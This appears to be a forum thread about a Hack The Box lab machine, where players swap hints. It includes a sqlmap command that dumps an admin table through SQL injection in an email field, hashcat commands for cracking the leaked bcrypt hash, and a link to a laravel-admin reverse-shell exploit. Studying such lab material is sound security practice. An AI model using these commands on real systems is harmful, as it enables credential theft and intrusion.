[TREXNEGRO]

Alguien pasa la SSH del User?

[Ferespartan19]

atabase: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                    |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How i can crack this that i dont know what options i need to put in hashcat

[mavz]

atabase: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                    |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How i can crack this that i dont know what options i need to put in hashcat

hashcat -m 3200 <hashfile> rockyou.txt

[Andrija0127]

Can someone pls help me with finding creds for user xander, i spent 2 hours and also used grep and got a lot of mentions with password but did not find password in home directory

[Ferespartan19]

atabase: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                    |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How i can crack this that i dont know what options i need to put in hashcat

hashcat -m 3200 <hashfile> rockyou.txt

I get this, i dont undertsant how put the hash into the file and why y cannot put it like this  $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL, can you explain me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

[medo5120]

Hello, i could reach the last part with the file linking trick. but, I can't seem to be able to extract the error as the terminal is always getting cleared. also there doesn't seem to be an error logging file. i tried to cat /proc/<pid>/fd/2 to get stderr but that doesn't seem to work, any help ?

[Rob1nhood]

can i get a nudge?
I was able to get through the forget-password, got shell, but when i checked hidden directories in Home. nothing stands out.
Tried Grep, Manually going through the directories etc.
I got persistence for dash via .ssh id_rsa
but im not finding any other credentials, or anything that stands out for priv escalation
and .bash_history didnt have anything useable.

---

atabase: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                    |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How i can crack this that i dont know what options i need to put in hashcat

hashcat -m 3200 <hashfile> rockyou.txt

I get this, i dont undertsant how put the hash into the file and why y cannot put it like this  $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL, can you explain me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

I did:
Hashcat -m3200 -a0 -o cracked.txt hash /usr/share/wordlists/rockyou.txt

Hope that helps 
M3200 is the flag for bcrypt (blowfish) ($2y$)

[b0bl0bl4ww]

atabase: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                    |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

How i can crack this that i dont know what options i need to put in hashcat

hashcat -m 3200 <hashfile> rockyou.txt

I get this, i dont undertsant how put the hash into the file and why y cannot put it like this  $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL, can you explain me?

Hashfile 'hashOg.txt' on line 1 ($2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5): Token length exception

* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

The entire hash should be $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 , ending in L2.
In your error message, it shows the hash as ending in H5 : "$2y$10...P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5" .
That may be the problem.

If that doesn't work, try running this command (replace location of rockyou.txt if necessary):
hashcat -m 3200 '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2' /usr/share/wordlists/rockyou.txt

---

Hello, i could reach the last part with the file linking trick. but, I can't seem to be able to extract the error as the terminal is always getting cleared. also there doesn't seem to be an error logging file. i tried to cat /proc/<pid>/fd/2 to get stderr but that doesn't seem to work, any help ?

So were you able to read root.txt?
What are you referring to when you say 'extract the error'?

---

In case anyone is still having problems with sqlmap, here are two possible fixes:

Add --flush-session flag, and/or delete files in ~/.local/share/sqlmap/output/usage.htb

Example command:
sqlmap -r req.txt --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --flush-session

Also, here is more info on laravel-admin PoC CVE-2023-24249 (getting a reverse shell):
https://flyd.uk/post/cve-2023-24249/

[Liy4]

root@usage:~# whoami
root
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@usage:~#

im in the xander.. i dont have any idea to get the root....... any hints??

[Andrija0127]

Can someone explain me how to become root?